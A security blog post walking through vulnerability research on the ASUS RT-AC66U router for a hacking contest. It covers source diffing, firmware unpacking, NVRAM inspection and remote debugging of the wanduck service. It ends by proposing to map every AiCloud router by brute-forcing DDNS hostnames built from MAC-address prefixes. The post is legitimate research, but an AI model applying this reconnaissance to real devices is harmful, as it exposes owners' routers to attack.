<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVTyUVmPGFbj615W_vs2LAzTBR9b3V_yrezPlZI4hPtlO3IgGdq9EMXRZmHcC_8UnG_p-LR-bTa1X0OByywPsivynVU8BnFdLi_GiugTNcQOpR2ARHCwAIHLSqLaYvqJGWceDJblU6bxK/s1600/sec1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVTyUVmPGFbj615W_vs2LAzTBR9b3V_yrezPlZI4hPtlO3IgGdq9EMXRZmHcC_8UnG_p-LR-bTa1X0OByywPsivynVU8BnFdLi_GiugTNcQOpR2ARHCwAIHLSqLaYvqJGWceDJblU6bxK/s1600/sec1.png" height="235" width="400" /></a></div>
<br />
According to the rules, we have to identify and exploit a 0-day vulnerability. We can combine different flaws with known issues in order to score points. If the vendor had silently patched an issue and you create an exploit for it, that should be scored as a valid 0-day (I'm not going to start discussing terminologies here).<br />
<br />
Now that we have the source code, it's time to extract and audit it: The <a href="https://trailofbits.github.io/ctf">CTF Field Guide</a> from Trail of Bits has some good resources on <a href="https://trailofbits.github.io/ctf/vulnerabilities/source.html">Auditing Source Code</a>. You can use tools like <a href="http://www.scootersoftware.com/">Beyond Compare</a>, <a href="http://www.araxis.com/merge/">Araxis Merge</a> and <a href="http://winmerge.org/">WinMerge</a> on Windows platforms or <a href="http://meldmerge.org/">Meld</a> if you're more of a Linux user.<br />
<br />
Let's focus on the "/asuswrt/release/src/router/" directory, comparing these two folders using Meld:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpU_9Vz6Z-wxyt-cpP-x5o9IAAyRA8eNODsTdXI7-hRUPk8bqFaV2PQmxHEspXsNNPpxny1rEqbl68_t038qJCsJ2wvvd4rfR7TUIopJ3rwbLbbjMaxpLeCLpICrDcxSpP4yvegzYVc-hq/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpU_9Vz6Z-wxyt-cpP-x5o9IAAyRA8eNODsTdXI7-hRUPk8bqFaV2PQmxHEspXsNNPpxny1rEqbl68_t038qJCsJ2wvvd4rfR7TUIopJ3rwbLbbjMaxpLeCLpICrDcxSpP4yvegzYVc-hq/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" height="363" width="640" /></a></div>
<br />
There are many security advisories for this router: if you want to find 0-days you should look for disclosed vulnerabilities and exploits to avoid duplicates (believe me, this is the hardest part). Some references:<br />
<br />
<ul>
<li><a href="http://infosec42.blogspot.com.br/2013/07/exploit-asus-rt-ac66u-remote-root.html">ASUS RT-AC66U Remote Root (Broadcom ACSD)</a></li>
<li><a href="http://www.securityfocus.com/archive/1/526942">ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln</a></li>
<li><a href="https://hatriot.github.io/blog/2013/06/05/asus-rt56u-remote-command-injection/">Asus RT56U Remote Command Injection</a></li>
<li><a href="http://securityevaluators.com/knowledge/case_studies/routers/asus_rtn56u.php">Taking over the ASUS RT-N56U and RT-AC66U</a></li>
<li><a href="http://arstechnica.com/security/2014/02/dear-asus-router-user-youve-been-pwned-thanks-to-easily-exploited-flaw/">Dear Asus router user: You’ve been pwned, thanks to easily exploited flaw (Asusgate)</a></li>
<li><a href="http://osvdb.com/search?search%5Bvuln_title%5D=asus&search%5Btext_type%5D=alltext">OSVDB</a></li>
</ul>
<br />
Points are deducted from your score if your exploits requires special system configurations and specific information. If you want to score lots of points, you should be targeting default services and processes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEz_oajJJQtcoUdjeoVaBr4IC0DGw1oCFyR-UHe2Ysd680egvW4P_zsGgOy92pe2XU8b3ChG_cGF-eFhYzHhNd9tRu9N1hNpjG5ZM_DBsy45TZheraVBkTAe2VNoGj8xY4NUg6rWNc4Z1I/s1600/ps.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEz_oajJJQtcoUdjeoVaBr4IC0DGw1oCFyR-UHe2Ysd680egvW4P_zsGgOy92pe2XU8b3ChG_cGF-eFhYzHhNd9tRu9N1hNpjG5ZM_DBsy45TZheraVBkTAe2VNoGj8xY4NUg6rWNc4Z1I/s1600/ps.PNG" height="330" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The USB application tab on the RT-AC66U allows the user to set up a series of services like FTP, DLNA, NFS and Samba:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRPDWub1KptkmejG2vy3HZTWR02w9dmGa4KdrfI5P0Fnt9YoeCrQ6Z-oGuJ4mHogmloEDqj8m8IYOfAo6i7nRT4NntDqRDWB0h2ElTkO2iy-nwXlnX1ghT-QIwF1rpaOXvm1H8mFRbVOFu/s1600/media.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRPDWub1KptkmejG2vy3HZTWR02w9dmGa4KdrfI5P0Fnt9YoeCrQ6Z-oGuJ4mHogmloEDqj8m8IYOfAo6i7nRT4NntDqRDWB0h2ElTkO2iy-nwXlnX1ghT-QIwF1rpaOXvm1H8mFRbVOFu/s1600/media.PNG" height="272" width="400" /></a></div>
<br />
MiniDLNA is also a nice a target. It should be pretty easy to find vulns for the service using <a href="https://twitter.com/zcutlip">Zachary Cutlip</a>'s <a href="http://shadow-file.blogspot.com.br/2014/05/infiltrate-2014.html">research</a>, as he broke it multiple times.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5_tbasGZV6urYnYEv05PYr3gI7sXqpnrTLEZD27QhvMJAmGNWFeXLZFHi7Obx24iUfiw-PHLFWtMNk4ot3l14CSYqoY8pfCmIrK9q_SVO7U7ll-J-CPIZAROJYf31ed6dm5doIDyjPtU3/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5_tbasGZV6urYnYEv05PYr3gI7sXqpnrTLEZD27QhvMJAmGNWFeXLZFHi7Obx24iUfiw-PHLFWtMNk4ot3l14CSYqoY8pfCmIrK9q_SVO7U7ll-J-CPIZAROJYf31ed6dm5doIDyjPtU3/s1600/diff.png" height="363" width="640" /></a><br />
<br />
Another <strike>potentially</strike> vulnerable service is AiCloud: it links your home network to an online Web storage service and lets you access it through a mobile application:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdADUAQ-CV1FOn6CnPc8-mlWhSEdVY4bmkrFinKxL3inWo0v1NQIO05h8EGSXGULpgPKBimjnGbPycLqru8n6w3NSAtwM9D-HeQaxkdMyAAyFbstp6VTgjGyhLHFdSYWMdvJRe8BykXwiU/s1600/aicloud.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdADUAQ-CV1FOn6CnPc8-mlWhSEdVY4bmkrFinKxL3inWo0v1NQIO05h8EGSXGULpgPKBimjnGbPycLqru8n6w3NSAtwM9D-HeQaxkdMyAAyFbstp6VTgjGyhLHFdSYWMdvJRe8BykXwiU/s1600/aicloud.PNG" height="330" width="400" /></a></div>
<br />
<b>forensic</b><br />
<br />
While part of the team audits the source code, the forensics guys should be unpacking the firmware using binwalk + fmk:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6-_FufdOjctWbvC-hbt9xDj-jWGrQWai84jDU8GmZ7-__6KueYkcBooeH2qUBzQ9UeVwv1bdxO5_ere7lcbGtMwrfv3_o2gCKsfRRuVTF9-0ceiSThrkHsXtw2ObqWPugvzP_SANuEPrM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6-_FufdOjctWbvC-hbt9xDj-jWGrQWai84jDU8GmZ7-__6KueYkcBooeH2qUBzQ9UeVwv1bdxO5_ere7lcbGtMwrfv3_o2gCKsfRRuVTF9-0ceiSThrkHsXtw2ObqWPugvzP_SANuEPrM/s1600/1.png" height="138" width="400" /></a></div>
<br />
You may remember <a href="https://github.com/bmaia/binwally">binwally</a>, the tool I developed to <a href="http://w00tsec.blogspot.com/2013/12/binwally-directory-tree-diff-tool-using.html">perform binary tree diff using fuzzy hashing</a>. Binwalk has its own option to <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">perform fuzzy hashing against files and directories</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3URWWmb8mindeh26hxw0O_Tp0EtOyqgCu-twCYAu-FjE3tRNMAhSL_De2Pn4NcnT5oHCO7aXBV6SEmb4yhofcOcJxEDRBCL_CUkA_hWDRJy87oatd9tHkZQ6SEoFC87ImjlUqVvVJImny/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3URWWmb8mindeh26hxw0O_Tp0EtOyqgCu-twCYAu-FjE3tRNMAhSL_De2Pn4NcnT5oHCO7aXBV6SEmb4yhofcOcJxEDRBCL_CUkA_hWDRJy87oatd9tHkZQ6SEoFC87ImjlUqVvVJImny/s1600/2.png" height="250" width="400" /></a></div>
<br />
Most vendors (like Asus) won't open source their entire code base. You may need to reverse proprietary drivers and binary blobs in order to find some good vulns. ACSD is a particularly interesting binary because it was removed from newer firmwares (v3.0.0.4.374.130+) due to a <a href="http://infosec42.blogspot.com/2013/07/exploit-asus-rt-ac66u-remote-root.html">vuln</a> disclosed by <a href="https://twitter.com/rootHak42">Jacob Holcomb</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuAFJiCtnNI6g0eFS7q3qP55x6PfqBecgmVfaxbbA1o2ZVqxHfbDQVUAVyq-w9OliKC9fxNw-69fTBCFVRERDM5nkMLkRGo8r_7osa9mWYgzCuYXfwEaOsrAB7T49QBI2429Qrj69GYuku/s1600/rem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuAFJiCtnNI6g0eFS7q3qP55x6PfqBecgmVfaxbbA1o2ZVqxHfbDQVUAVyq-w9OliKC9fxNw-69fTBCFVRERDM5nkMLkRGo8r_7osa9mWYgzCuYXfwEaOsrAB7T49QBI2429Qrj69GYuku/s1600/rem.png" height="140" width="400" /></a></div>
<br />
The binaries are MIPS and Little Edian:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoLOgG8ZG91MBDPvoCip36IJ1qcDQumxfbDynFFd7sXcWD4JxG1ryzOfW0yhP6iI2I4cp0x6mhGnAIZT-G-XYK9zw5uO2bdx7zEwTC35exXI9eqP9_GKX4vTexhCUgxtUY4DWf-h6a4Lq/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoLOgG8ZG91MBDPvoCip36IJ1qcDQumxfbDynFFd7sXcWD4JxG1ryzOfW0yhP6iI2I4cp0x6mhGnAIZT-G-XYK9zw5uO2bdx7zEwTC35exXI9eqP9_GKX4vTexhCUgxtUY4DWf-h6a4Lq/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" height="232" width="400" /></a></div>
<br />
It's also important to learn more about the filesystem. The OpenWRT Wiki has a nice <a href="http://wiki.openwrt.org/doc/techref/flash.layout">article on Flash Layouts</a>. The <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">MTD subsystem</a> for Linux provides access to flash devices, creating fully functional filesystems. SSH to the device and map the mount points and partitions:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX93wAg3NIiYWLaMUXcXgfFCduMHcs18tHWGrEg5r2pR6KITLxq9sLjWSJgdVIMdt9PKEHm36fkXZJG50EC9CcviaPHaU1pumAHBSPH0emmVf-9F-cSK1fxDxB-HX7O2G6ARSIBVLVdTGc/s1600/fs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX93wAg3NIiYWLaMUXcXgfFCduMHcs18tHWGrEg5r2pR6KITLxq9sLjWSJgdVIMdt9PKEHm36fkXZJG50EC9CcviaPHaU1pumAHBSPH0emmVf-9F-cSK1fxDxB-HX7O2G6ARSIBVLVdTGc/s1600/fs.PNG" height="212" width="400" /></a></div>
<br />
The NVRAM partition is very valuable for us because it stores all the configuration parameters. We can view its content by dumping the corresponding partition (mtd1) or by issuing the "<i>nvram show</i>" command:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYvfqb2P00SmH3UesadOpkhrFzxZes039WFWB0Z5NPHvY1Y2loo-8mGV0-7H5KVtVsIBpih9wrGQpF1n1C7E0Ea27T0eNu1yIDP-WZO-KfRfTK0cNlki6gPMEEqZJEmYxu2F6kEWlUmbmp/s1600/dd1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYvfqb2P00SmH3UesadOpkhrFzxZes039WFWB0Z5NPHvY1Y2loo-8mGV0-7H5KVtVsIBpih9wrGQpF1n1C7E0Ea27T0eNu1yIDP-WZO-KfRfTK0cNlki6gPMEEqZJEmYxu2F6kEWlUmbmp/s1600/dd1.PNG" height="85" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVwdontK1K6eVmh94lgK9c47UJgPB4Xtx04q28ayQuveyd1EnQSaiC_0nd7PGPO6n5DpBj4_voTbx50OiT2gg6AUTwsiEf16IWSyAUyZbKTlxnjlJFQuxHgOvJxvjJ-3qBKcdq1k2wah9A/s1600/dd2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVwdontK1K6eVmh94lgK9c47UJgPB4Xtx04q28ayQuveyd1EnQSaiC_0nd7PGPO6n5DpBj4_voTbx50OiT2gg6AUTwsiEf16IWSyAUyZbKTlxnjlJFQuxHgOvJxvjJ-3qBKcdq1k2wah9A/s1600/dd2.PNG" height="156" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Another interesting partition is the bootloader (pmon). It has some LZMA compressed data and the boot process provides a failsafe mechanism to recover from a bad flash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJFGteHkkNNDRdDLWkvQFkvDNAnCf29UCwviVIAO9IRUJVSX0hVLMe242cJbqexZTC3p6fHhFxeydnlS-5N9nLFClXyKaAg2Dn5SatVviPiL2qGeFIs4Zt-J6kNSyMygfZfB5CiYX82R0l/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJFGteHkkNNDRdDLWkvQFkvDNAnCf29UCwviVIAO9IRUJVSX0hVLMe242cJbqexZTC3p6fHhFxeydnlS-5N9nLFClXyKaAg2Dn5SatVviPiL2qGeFIs4Zt-J6kNSyMygfZfB5CiYX82R0l/s1600/x1.png" height="273" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnWpDzip-A1RbjzF-HzDhKzYwm2jp5qFnbkVTrMVe2kIdh77fBUCSy2m-6ZX6ANm-yZ4hOXsCkEwL3mZ6FFxswiCh4gS41t9MVC6GymgziYh-pi1Vi0o8JQtfSuNb7VsV0zFYNGipwlXke/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnWpDzip-A1RbjzF-HzDhKzYwm2jp5qFnbkVTrMVe2kIdh77fBUCSy2m-6ZX6ANm-yZ4hOXsCkEwL3mZ6FFxswiCh4gS41t9MVC6GymgziYh-pi1Vi0o8JQtfSuNb7VsV0zFYNGipwlXke/s1600/x2.png" height="333" width="400" /></a></div>
<br />
<b>reverse</b><br />
<div>
<b><br /></b>
Time to start the reversing tasks. We need some basic tools like gdb, gdbserver and strace to start debugging the binaries: we could either cross compile them or set up <a href="https://github.com/RMerl/asuswrt-merlin/wiki/Entware">Optware/Entware</a> to install prebuilt packages.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjbsqGMeZpCEU783gA-Ks7DrIB0De92oaRk0Ms70EEgS4TPFGfhj-_2hSJuRqW9sE13d_rHRB9_Q7Wzc79HEYNBn3zxeoan-HZ38GAMy-7hpeNGXaTv3diJWqhzXUVi9LD8ZwM-p5gc1-f/s1600/gdb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjbsqGMeZpCEU783gA-Ks7DrIB0De92oaRk0Ms70EEgS4TPFGfhj-_2hSJuRqW9sE13d_rHRB9_Q7Wzc79HEYNBn3zxeoan-HZ38GAMy-7hpeNGXaTv3diJWqhzXUVi9LD8ZwM-p5gc1-f/s1600/gdb.PNG" height="220" width="400" /></a></div>
<div>
<br />
Wanduck (GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/rc/wanduck.c) is an interesting process to analyze. It starts by default and binds a pseudo HTTP server on port 18017. The HTTP server redirects every request to the main administrative interface and, for some reason, it drops requests to URL's ending with ".ico".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju-0kw_0352-u-EIduRSwu3Jei4jHQgL6Y3bpXh-dgRFyd-fIh3SSOh56GOl7CulxfVoUGJfet7hcAS46QSbSAR3GAc6ydTphFycZqoOzya-9iaYaF3PN0bKsccEM0AriLuKUod7awaDZX/s1600/wando1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju-0kw_0352-u-EIduRSwu3Jei4jHQgL6Y3bpXh-dgRFyd-fIh3SSOh56GOl7CulxfVoUGJfet7hcAS46QSbSAR3GAc6ydTphFycZqoOzya-9iaYaF3PN0bKsccEM0AriLuKUod7awaDZX/s1600/wando1.png" height="321" width="400" /></a></div>
<br />
Let's find out why: start gdbserver on the remote target (gdbserver --multi localhost:12345 &) and connect to your debugger of choice. If you're using Ida Pro, open the binary "/sbin/wanduck" and set the processor type to "mipsrl".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7nY_9m13F8kui7B_IzqTLSzSFYimdkVpWNFW0oqF6TE5mQ_xpguX91MW_v7nO4Yex6zw_YeSzJkNcWrCsQm6YVRPJqcX4Tgwcj_30ipDmdr1q_86eolhhmzWJXB1HrWPELof7TPlWs_ZE/s1600/gdb2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7nY_9m13F8kui7B_IzqTLSzSFYimdkVpWNFW0oqF6TE5mQ_xpguX91MW_v7nO4Yex6zw_YeSzJkNcWrCsQm6YVRPJqcX4Tgwcj_30ipDmdr1q_86eolhhmzWJXB1HrWPELof7TPlWs_ZE/s1600/gdb2.PNG" height="95" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Navigate to the <i>handle_http_req</i> function and set a breakpoint on the <i>dst_url </i>comparison:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8UPeJEGoANmSFJW1CsdRPwqQeAD7GiVG2MSeX2Goc46Zi-RWDEI9yxDDPuv50LlvFn4n-7PQFVKRli4EkamjU_MI0pNwcd0rGeh9R2R0d09pFhouKUHiC4Rc47Ov2ZNK8gIbD5x3bM_ZS/s1600/wandox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8UPeJEGoANmSFJW1CsdRPwqQeAD7GiVG2MSeX2Goc46Zi-RWDEI9yxDDPuv50LlvFn4n-7PQFVKRli4EkamjU_MI0pNwcd0rGeh9R2R0d09pFhouKUHiC4Rc47Ov2ZNK8gIbD5x3bM_ZS/s1600/wandox.png" height="435" width="640" /></a></div>
<div>
<br /></div>
<div>
Enter the gdbserver's host and port under "Debugger / Process Options" and attach to the corresponding PID.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioHkbm8OLjjBNJwYYAyCVGtgfxne3SZOxhtV4sh5ODiTpXPBDMS9ep5gR8R2DrGt3Ho4V624IO6wB3qSPs0_-ecmUHq30TZoxgt7HEonXce20LX74THv8nmvRa3jeio3Z6ieQlEbsTY6pL/s1600/wando3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioHkbm8OLjjBNJwYYAyCVGtgfxne3SZOxhtV4sh5ODiTpXPBDMS9ep5gR8R2DrGt3Ho4V624IO6wB3qSPs0_-ecmUHq30TZoxgt7HEonXce20LX74THv8nmvRa3jeio3Z6ieQlEbsTY6pL/s1600/wando3.PNG" height="144" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOk4wrcpgRaaTC__wMsOevqN13ZORjjdzh-2vQmt9pEBCIhtdXxjF-ltHoC2C0AE0q1IMQca5x2WfOR6MhmFY_p7RBShSOiZ6qg7-7dzmBA3tKgpKP4z_cnYJOsDsOFlS-qOHWWPEISfTi/s1600/wando4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOk4wrcpgRaaTC__wMsOevqN13ZORjjdzh-2vQmt9pEBCIhtdXxjF-ltHoC2C0AE0q1IMQca5x2WfOR6MhmFY_p7RBShSOiZ6qg7-7dzmBA3tKgpKP4z_cnYJOsDsOFlS-qOHWWPEISfTi/s1600/wando4.PNG" height="94" width="320" /></a></div>
<br />
Resume the process (F9) and make an HTTP request to http://192.168.1.1/x.ico. The debugger will stop at the defined breakpoint and you can now inspect the registers and the memory.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCQhommGkXLT9P6dATrfDEgVsOVWrMAEWs7K465vJWavyEqCyYQwNWYdOvR-dyeXQcpICvqQpZBIfn12XdOd4clqj6LM3kFe9z4_CX8N8i9vzPDVoXC0FA81ghGL286iTRBeOqPIC66PnE/s1600/ida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCQhommGkXLT9P6dATrfDEgVsOVWrMAEWs7K465vJWavyEqCyYQwNWYdOvR-dyeXQcpICvqQpZBIfn12XdOd4clqj6LM3kFe9z4_CX8N8i9vzPDVoXC0FA81ghGL286iTRBeOqPIC66PnE/s1600/ida.png" height="320" width="640" /></a></div>
<br />
If you want to find reverse engineering targets, search for folders named "<i>prebuilt</i>" under "GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/". Some interesting binaries:<br />
<br />
- /acsd/prebuilt/acsd<br />
- /webdav_client/prebuilt/webdav_client<br />
- /asuswebstorage/prebuilt/asuswebstorage<br />
- /eapd/linux/prebuilt/eapd<br />
- /nas/nas/prebuilt/nas<br />
- /flash/prebuilt/flash<br />
- /et/prebuilt/et<br />
- /wps/prebuilt/wps_monitor<br />
- /ated/prebuilt/ated<br />
- /wlconf/prebuilt/wlconf<br />
<br />
The mobile AiCloud app might reveal some interesting information about how the device works. If you reverse the APK or use an intercepting proxy you can identify the app's initial HTTP request:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMka8vzsD9OEC7Co-j1DefDUYHIbWl7PkNF2eJNI4-BwJSO1lGqmLTzwq75PHAPYmvfkA3dgNfAq-WGZJHeH8PCzoe44NzaxX2W9U8M2ec1Ns0lSrThKjBirglAm7rrELxbseGlS7FiG7w/s1600/aix2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMka8vzsD9OEC7Co-j1DefDUYHIbWl7PkNF2eJNI4-BwJSO1lGqmLTzwq75PHAPYmvfkA3dgNfAq-WGZJHeH8PCzoe44NzaxX2W9U8M2ec1Ns0lSrThKjBirglAm7rrELxbseGlS7FiG7w/s1600/aix2.png" height="320" width="192" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67WDtNz51GS__puFqTmN71KjQO5fxqjW4tqBJE_-VWyaZ2dGhSltAaBTw99PSB1QLODVboi7rn6u9lLrnDpIMwiklhOmva279Xd7ibb0rWZkg5gFcvnnKbHc_3_5nEuUzriZGXTP-dLmE/s1600/aix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67WDtNz51GS__puFqTmN71KjQO5fxqjW4tqBJE_-VWyaZ2dGhSltAaBTw99PSB1QLODVboi7rn6u9lLrnDpIMwiklhOmva279Xd7ibb0rWZkg5gFcvnnKbHc_3_5nEuUzriZGXTP-dLmE/s1600/aix.png" height="320" width="192" /></a></div>
<div>
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBD6Ue7_U8JhgLuRb3Uiq1LsFmZdgKcxmWZE34hkSn-pwoIBk8-7pCgOluoLnDPtyc3ZBSANtiSV7h44_SIcJHC87vvfZbRrrZnGCdbb3AHI-5yO4QKyVRJ6LzAopY-cWko1RK4w8-7sHj/s1600/aicl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBD6Ue7_U8JhgLuRb3Uiq1LsFmZdgKcxmWZE34hkSn-pwoIBk8-7pCgOluoLnDPtyc3ZBSANtiSV7h44_SIcJHC87vvfZbRrrZnGCdbb3AHI-5yO4QKyVRJ6LzAopY-cWko1RK4w8-7sHj/s1600/aicl.png" height="240" width="640" /></a></div>
<div>
<br /></div>
<div>
You see that strange <i>ddns_hostname</i>? That's a crypto task =)</div>
<div>
<br /></div>
<b>crypto</b><br />
<br />
The POST request tries to register a new Dynamic DNS using the asuscomm.com service. If we search for the term <i>asuscomm.com</i> on the RT-AC66U source code, we can easily find the function that generates this DDNS:<br />
<br />
<script src="https://gist.github.com/bmaia/5bad1648d4b2b9a54063.js"></script>
According to <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">WikiDevi</a>, the following OUIs are currently being used by the RT-AC66U:<br />
<br />
- 08:60:6E (1 E, 1 W, 2011)<br />
- 10:BF:48 (1 E, 2 W, 2011)<br />
- 30:85:A9 (3 E, 3 W, 2011)<br />
- 50:46:5D (1 E, 2 W, 2012)<br />
<br />
Using this information we can map the IP address for every single router using AiCloud. Let's generate a list of all the possible MAC addresses and brute force the hostnames using <a href="http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/">this cool trick</a> from <a href="https://twitter.com/mubix">mubix</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
